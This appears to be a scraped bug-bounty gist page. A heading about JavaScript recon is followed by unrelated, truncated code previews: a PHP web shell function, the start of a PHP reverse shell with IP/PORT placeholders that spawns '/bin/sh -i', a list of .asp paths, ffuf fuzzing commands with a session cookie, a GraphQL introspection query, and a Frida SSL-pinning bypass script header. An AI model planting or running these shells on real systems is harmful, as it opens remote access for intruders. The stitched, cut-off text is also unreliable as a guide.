This is a simple guide to performing JavaScript recon in bug bounty work.
- The first step is to collect as many JavaScript files as possible (
more files
= more paths and parameters
-> more vulns
)
<?php | |
function featureShell($cmd, $cwd) { | |
$stdout = array(); | |
if (preg_match("/^\s*cd\s*$/", $cmd)) { | |
// pass | |
} elseif (preg_match("/^\s*cd\s+(.+)\s*(2>&1)?$/", $cmd)) { | |
chdir($cwd); | |
preg_match("/^\s*cd\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match); |
<?php | |
set_time_limit (0); | |
$VERSION = "1.0"; | |
$ip = 'IP'; // CHANGE THIS | |
$port = PORT; // CHANGE THIS | |
$chunk_size = 1400; | |
$write_a = null; | |
$error_a = null; | |
$shell = 'uname -a; w; id; /bin/sh -i'; | |
$daemon = 0; |
sound/pci/cs46xx/imgs/cwcdma.asp | |
sites/all/libraries/ckeditor/ckeditor.asp | |
sites/all/libraries/ckeditor/_samples/asp/events.asp | |
sites/all/libraries/ckeditor/_samples/asp/sample_posteddata.asp | |
sites/all/libraries/ckeditor/_samples/asp/standalone.asp | |
sites/all/libraries/ckeditor/_samples/asp/replaceall.asp | |
sites/all/libraries/ckeditor/_samples/asp/advanced.asp | |
sites/all/libraries/ckeditor/_samples/asp/replace.asp | |
src/main/webapp/static/my97datepicker/docs/demo/resource/main.asp | |
library/custom_template/ckeditor/_samples/asp/replaceall.asp |
package main | |
import ( | |
"bufio" | |
"flag" | |
"fmt" | |
"net" | |
"os" | |
"sync" | |
) |
# Basic Usage | |
ffuf -w wordlist.txt -u http://127.0.0.1:8000/api/FUZZ/6 -o output.txt -replay-proxy http://127.0.0.1:8080 | |
# Basic Usage With a Cookie | |
ffuf -w wordlist.txt -u http://127.0.0.1:8000/api/FUZZ/6 -o output.txt -replay-proxy http://127.0.0.1:8080 -b "laravel_session=eyJpdiI6Ii8wQU11dTVlUkg2alRHUXBIVzlGSnc9PSIsInZhbHVlIjoiOWs3YllJWTdqNC9xa1pMeFRvMFh0OE1vRFpaWm9GSzFkRktVZS9yUHBDM0lIazZ4K0NsbndxWVIxQ05VZWhqZUZaR0RGQWlFdmdDc24yWllYRklGSXI5STd2b05Pam4yRXIwV1BUWkZhUnFLNUFzOWsycmRHcnlxS0FqRWNsSnEiLCJtYWMiOiI3ZTliMmM2YzIxOTExNDE0NmVjYTYyMGI4Nzg4YzJiYjNmNjVkNDI1YzEyODYwMzY5YzczNzY3NTUwZDk0OGYzIn0%3D;" | |
# Adding a delay | |
ffuf -w wordlist.txt -u http://127.0.0.1:8000/api/FUZZ/6 -o output.txt -replay-proxy http://127.0.0.1:8080 -p 1 -t 3 | |
# Adding a delay (new method) |
query IntrospectionQuery { | |
__schema { | |
queryType { name } | |
mutationType { name } | |
subscriptionType { name } | |
types { | |
...FullType | |
} | |
directives { | |
name |
/* | |
Android SSL Re-pinning frida script v0.2 030417-pier | |
$ adb push burpca-cert-der.crt /data/local/tmp/cert-der.crt | |
$ frida -U -f it.app.mobile -l frida-android-repinning.js --no-pause | |
https://techblog.mediaservice.net/2017/07/universal-android-ssl-pinning-bypass-with-frida/ | |
UPDATE 20191605: Fixed undeclared var. Thanks to @oleavr and @ehsanpc9999 ! | |
*/ |